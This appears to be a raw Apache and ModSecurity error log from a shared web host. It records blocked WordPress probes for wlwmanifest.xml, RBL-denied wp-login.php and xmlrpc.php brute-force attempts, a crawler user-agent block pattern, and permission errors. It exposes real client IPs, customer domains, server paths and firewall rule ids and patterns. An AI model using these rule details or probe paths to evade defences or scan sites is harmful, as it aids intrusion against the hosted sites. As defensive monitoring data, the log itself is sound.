[Tue May 26 18:51:40.652443 2026] [security2:error] [pid 1036960:tid 1037099] [client 85.204.70.104:55880] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "strapptech.com"] [uri "/media/wp-includes/wlwmanifest.xml"] [unique_id "ahWeZIGNKXNii6nttH9NiQAAAI4"]
[Tue May 26 18:51:40.769318 2026] [security2:error] [pid 1036960:tid 1037060] [remote 88.198.165.116:38570] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 116.165.198.88.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWeZIGNKXNii6nttH9NiAAA7WM"]
[Tue May 26 18:51:40.961186 2026] [security2:error] [pid 1036960:tid 1037192] [client 85.204.70.104:55890] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "strapptech.com"] [uri "/wp2/wp-includes/wlwmanifest.xml"] [unique_id "ahWeZIGNKXNii6nttH9NmAAAAOs"]
[Tue May 26 18:51:41.447761 2026] [security2:error] [pid 1036960:tid 1037205] [client 85.204.70.104:55900] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "strapptech.com"] [uri "/site/wp-includes/wlwmanifest.xml"] [unique_id "ahWeZYGNKXNii6nttH9NpAAAAPg"]
[Tue May 26 18:51:41.543431 2026] [security2:error] [pid 1036960:tid 1037141] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWeZYGNKXNii6nttH9NnAAAALg"]
[Tue May 26 18:51:41.655847 2026] [security2:error] [pid 1036960:tid 1037083] [remote 103.11.102.106:39178] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 106.102.11.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahWeZYGNKXNii6nttH9NpQAAiXo"]
[Tue May 26 18:51:41.686349 2026] [security2:error] [pid 1036960:tid 1037056] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWeZYGNKXNii6nttH9NoAAA6l8"]
[Tue May 26 18:51:41.686602 2026] [security2:error] [pid 1036960:tid 1037191] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWeZYGNKXNii6nttH9NoAAA6l8"]
[Tue May 26 18:51:41.748790 2026] [security2:error] [pid 1036960:tid 1037104] [client 85.204.70.104:55902] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "strapptech.com"] [uri "/cms/wp-includes/wlwmanifest.xml"] [unique_id "ahWeZYGNKXNii6nttH9NsgAAAJM"]
[Tue May 26 18:51:42.056916 2026] [security2:error] [pid 1036960:tid 1037179] [client 85.204.70.104:55918] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "strapptech.com"] [uri "/sito/wp-includes/wlwmanifest.xml"] [unique_id "ahWeZoGNKXNii6nttH9NuQAAAN4"]
[Tue May 26 18:51:43.365937 2026] [security2:error] [pid 1036960:tid 1037127] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWeZoGNKXNii6nttH9NzgAAAKo"]
[Tue May 26 18:51:44.967813 2026] [autoindex:error] [pid 1036960:tid 1037193] [client 45.134.225.250:0] AH01276: Cannot serve directory /home1/anujtrad/public_html/wp-content/uploads/2020/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 18:51:45.401340 2026] [security2:error] [pid 1036960:tid 1037079] [remote 199.247.4.24:52768] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 24.4.247.199.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWeaYGNKXNii6nttH9OEQAA0HY"]
[Tue May 26 18:51:46.216475 2026] [security2:error] [pid 1036960:tid 1037099] [client 79.12.24.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWeaYGNKXNii6nttH9OIAAAAI4"]
[Tue May 26 18:51:46.271895 2026] [security2:error] [pid 1036960:tid 1037191] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWeaYGNKXNii6nttH9OJgAAAOo"]
[Tue May 26 18:51:48.520911 2026] [security2:error] [pid 1036960:tid 1037202] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWebIGNKXNii6nttH9OXQAAAPU"]
[Tue May 26 18:51:50.959254 2026] [security2:error] [pid 1036960:tid 1037085] [remote 51.68.111.199:0] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "digitalgerminate.com"] [uri "/robots.txt"] [unique_id "ahWeboGNKXNii6nttH9OtAAAyXw"]
[Tue May 26 18:51:50.959430 2026] [security2:error] [pid 1036960:tid 1037158] [client 51.68.111.199:0] ModSecurity: Warning. Matched phrase "MJ12bot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "digitalgerminate.com"] [uri "/robots.txt"] [unique_id "ahWeboGNKXNii6nttH9OtAAAyXw"]
[Tue May 26 18:51:51.395141 2026] [security2:error] [pid 1036960:tid 1037210] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWeboGNKXNii6nttH9OtgAAAP0"]
[Tue May 26 18:51:51.938941 2026] [security2:error] [pid 1036960:tid 1037107] [client 32.198.120.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "samayikprasanga.in"] [uri "/epaper.php"] [unique_id "ahWeb4GNKXNii6nttH9O0QAAAJY"]
[Tue May 26 18:51:51.939469 2026] [security2:error] [pid 1036960:tid 1037094] [client 32.198.120.40:55894] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "samayikprasanga.in"] [uri "/epaper.php"] [unique_id "ahWeb4GNKXNii6nttH9OxgAAAIk"]
[Tue May 26 18:51:52.244241 2026] [security2:error] [pid 1036960:tid 1036974] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWecIGNKXNii6nttH9O1AAA9g0"]
[Tue May 26 18:51:52.244439 2026] [security2:error] [pid 1036960:tid 1037203] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWecIGNKXNii6nttH9O1AAA9g0"]
[Tue May 26 18:51:53.280568 2026] [security2:error] [pid 1036960:tid 1037138] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWecIGNKXNii6nttH9O5wAAALU"]
[Tue May 26 18:51:54.067192 2026] [proxy:warn] [pid 1036960:tid 1037137] [client 137.110.161.101:37232] AH01092: no HTTP 0.9 request (with no host line) on incoming request and preserve host set forcing hostname to be thedebateafrica.org for uri /400.shtml
[Tue May 26 18:51:54.174472 2026] [security2:error] [pid 1036960:tid 1037187] [client 137.110.161.101:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "207.174.214.47"] [uri "/index.php"] [unique_id "ahWecoGNKXNii6nttH9PBAAAAOY"]
[Tue May 26 18:51:54.176130 2026] [security2:error] [pid 1036960:tid 1037170] [client 137.110.161.101:39160] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "207.174.214.47"] [uri "/"] [unique_id "ahWecoGNKXNii6nttH9PAAAAANU"]
[Tue May 26 18:51:54.196470 2026] [security2:error] [pid 1036960:tid 1037176] [client 137.110.161.101:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "500"] [hostname "thedebateafrica.org"] [uri "/index.php"] [unique_id "ahWecoGNKXNii6nttH9PBgAAANs"]
[Tue May 26 18:51:54.197116 2026] [security2:error] [pid 1036960:tid 1037137] [client 137.110.161.101:37232] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "500"] [hostname "thedebateafrica.org"] [uri "/400.shtml"] [unique_id "ahWecoGNKXNii6nttH9PAQAAALQ"]
[Tue May 26 18:51:54.494190 2026] [security2:error] [pid 1036960:tid 1037167] [client 137.110.161.101:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "500"] [hostname "thedebateafrica.org"] [uri "/index.php"] [unique_id "ahWecoGNKXNii6nttH9PEwAAANI"]
[Tue May 26 18:51:54.494767 2026] [security2:error] [pid 1036960:tid 1037094] [client 137.110.161.101:37246] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "500"] [hostname "thedebateafrica.org"] [uri "/"] [unique_id "ahWecoGNKXNii6nttH9PEQAAAIk"]
[Tue May 26 18:51:56.009086 2026] [security2:error] [pid 1036960:tid 1037132] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWec4GNKXNii6nttH9POAAAAK8"]
[Tue May 26 18:51:57.963124 2026] [security2:error] [pid 1036960:tid 1037207] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWedYGNKXNii6nttH9PYgAAAPo"]
[Tue May 26 18:51:57.986540 2026] [security2:error] [pid 1036960:tid 1037001] [remote 18.219.113.49:52618] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 49.113.219.18.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "dimensioncorporativa.com.co"] [uri "/wp-login.php"] [unique_id "ahWedYGNKXNii6nttH9PbQAAvCg"]
[Tue May 26 18:52:00.328146 2026] [security2:error] [pid 1036960:tid 1037113] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWed4GNKXNii6nttH9PmwAAAJw"]
[Tue May 26 18:52:00.559773 2026] [security2:error] [pid 1036960:tid 1037019] [remote 18.219.113.49:52618] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 49.113.219.18.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "dimensioncorporativa.com.co"] [uri "/wp-login.php"] [unique_id "ahWeeIGNKXNii6nttH9PpgAAjzo"], referer: https://dimensioncorporativa.com.co/wp-login.php
[Tue May 26 18:52:01.976816 2026] [security2:error] [pid 1036960:tid 1037181] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahWeeYGNKXNii6nttH9PwwAAAOA"]
[Tue May 26 18:52:02.708784 2026] [security2:error] [pid 1036960:tid 1037163] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWeeoGNKXNii6nttH9P4AAAAM4"]
[Tue May 26 18:52:03.141284 2026] [security2:error] [pid 1036960:tid 1037012] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWee4GNKXNii6nttH9P9QAAmDM"]
[Tue May 26 18:52:03.141482 2026] [security2:error] [pid 1036960:tid 1037109] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWee4GNKXNii6nttH9P9QAAmDM"]
[Tue May 26 18:52:04.946543 2026] [security2:error] [pid 1036960:tid 1037017] [remote 5.42.158.148:57370] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 148.158.42.5.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "koneksi.com.co"] [uri "/wp-login.php"] [unique_id "ahWefIGNKXNii6nttH9QDgAA9Tg"]
[Tue May 26 18:52:05.035229 2026] [security2:error] [pid 1036960:tid 1037016] [remote 95.163.221.139:21529] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 139.221.163.95.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahWefIGNKXNii6nttH9QEgAAmTc"]
[Tue May 26 18:52:05.248770 2026] [security2:error] [pid 1036960:tid 1037170] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWefIGNKXNii6nttH9QEQAAANU"]
[Tue May 26 18:52:05.661185 2026] [core:crit] [pid 1036960:tid 1037158] (13)Permission denied: [client 40.77.167.151:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 18:52:06.108260 2026] [security2:error] [pid 1036960:tid 1037026] [remote 95.163.221.139:21529] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 139.221.163.95.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahWefYGNKXNii6nttH9QLwAAiUE"], referer: https://anujtradingco.com/wp-login.php
[Tue May 26 18:52:07.432859 2026] [security2:error] [pid 1036960:tid 1037120] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWefoGNKXNii6nttH9QRwAAAKM"]
[Tue May 26 18:52:09.156262 2026] [security2:error] [pid 1036960:tid 1037217] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWegIGNKXNii6nttH9QkQAAAQQ"]
[Tue May 26 18:52:10.064543 2026] [core:crit] [pid 1036960:tid 1037102] (13)Permission denied: [client 52.167.144.160:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 18:52:10.169087 2026] [security2:error] [pid 1036960:tid 1037161] [client 203.210.180.110:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWegYGNKXNii6nttH9QswAAAMw"]
[Tue May 26 18:52:10.703415 2026] [security2:error] [pid 1036960:tid 1037069] [remote 72.167.150.128:51276] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.150.167.72.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWegoGNKXNii6nttH9QyQAA7Gw"]
[Tue May 26 18:52:11.566897 2026] [security2:error] [pid 1036960:tid 1037057] [remote 72.167.150.128:51276] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.150.167.72.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWeg4GNKXNii6nttH9Q6wAApWA"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:52:12.131238 2026] [security2:error] [pid 1036960:tid 1037102] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWeg4GNKXNii6nttH9Q8QAAAJE"]
[Tue May 26 18:52:14.324459 2026] [security2:error] [pid 1036960:tid 1036962] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWehYGNKXNii6nttH9RLQAAhwE"]
[Tue May 26 18:52:14.324706 2026] [security2:error] [pid 1036960:tid 1037092] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWehYGNKXNii6nttH9RLQAAhwE"]
[Tue May 26 18:52:14.469667 2026] [security2:error] [pid 1036960:tid 1037176] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWehoGNKXNii6nttH9RMgAAANs"]
[Tue May 26 18:52:15.727725 2026] [security2:error] [pid 1036960:tid 1037076] [remote 18.219.113.49:55400] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 49.113.219.18.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWeh4GNKXNii6nttH9RUwAAj3M"]
[Tue May 26 18:52:16.840833 2026] [security2:error] [pid 1036960:tid 1037211] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWeiIGNKXNii6nttH9RYgAAAP4"]
[Tue May 26 18:52:17.245728 2026] [security2:error] [pid 1036960:tid 1037112] [client 185.191.171.19:42606] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/category/upcoming-events/page/2/"] [unique_id "ahWeiYGNKXNii6nttH9RfAAAAJs"]
[Tue May 26 18:52:17.245868 2026] [security2:error] [pid 1036960:tid 1037112] [client 185.191.171.19:42606] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/category/upcoming-events/page/2/"] [unique_id "ahWeiYGNKXNii6nttH9RfAAAAJs"]
[Tue May 26 18:52:17.717381 2026] [security2:error] [pid 1036960:tid 1037141] [client 114.119.134.127:35669] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "plenitudotonal.com"] [uri "/"] [unique_id "ahWeiYGNKXNii6nttH9RhQAAALg"], referer: https://domains.tntcode.com/ip/209.99.16.240
[Tue May 26 18:52:19.286732 2026] [security2:error] [pid 1036960:tid 1037192] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWeioGNKXNii6nttH9RqgAAAOs"]
[Tue May 26 18:52:19.673480 2026] [security2:error] [pid 1036960:tid 1037087] [remote 185.230.216.227:60234] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 227.216.230.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWei4GNKXNii6nttH9RvAAArH4"]
[Tue May 26 18:52:20.894568 2026] [security2:error] [pid 1036960:tid 1037172] [client 65.109.156.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWejIGNKXNii6nttH9R3wAAANc"]
[Tue May 26 18:52:20.894630 2026] [security2:error] [pid 1036960:tid 1037172] [client 65.109.156.37:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWejIGNKXNii6nttH9R3wAAANc"]
[Tue May 26 18:52:20.894900 2026] [security2:error] [pid 1036960:tid 1037143] [client 65.109.156.37:60359] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/homepages/portfolio-photo/"] [unique_id "ahWejIGNKXNii6nttH9R3QAAALo"]
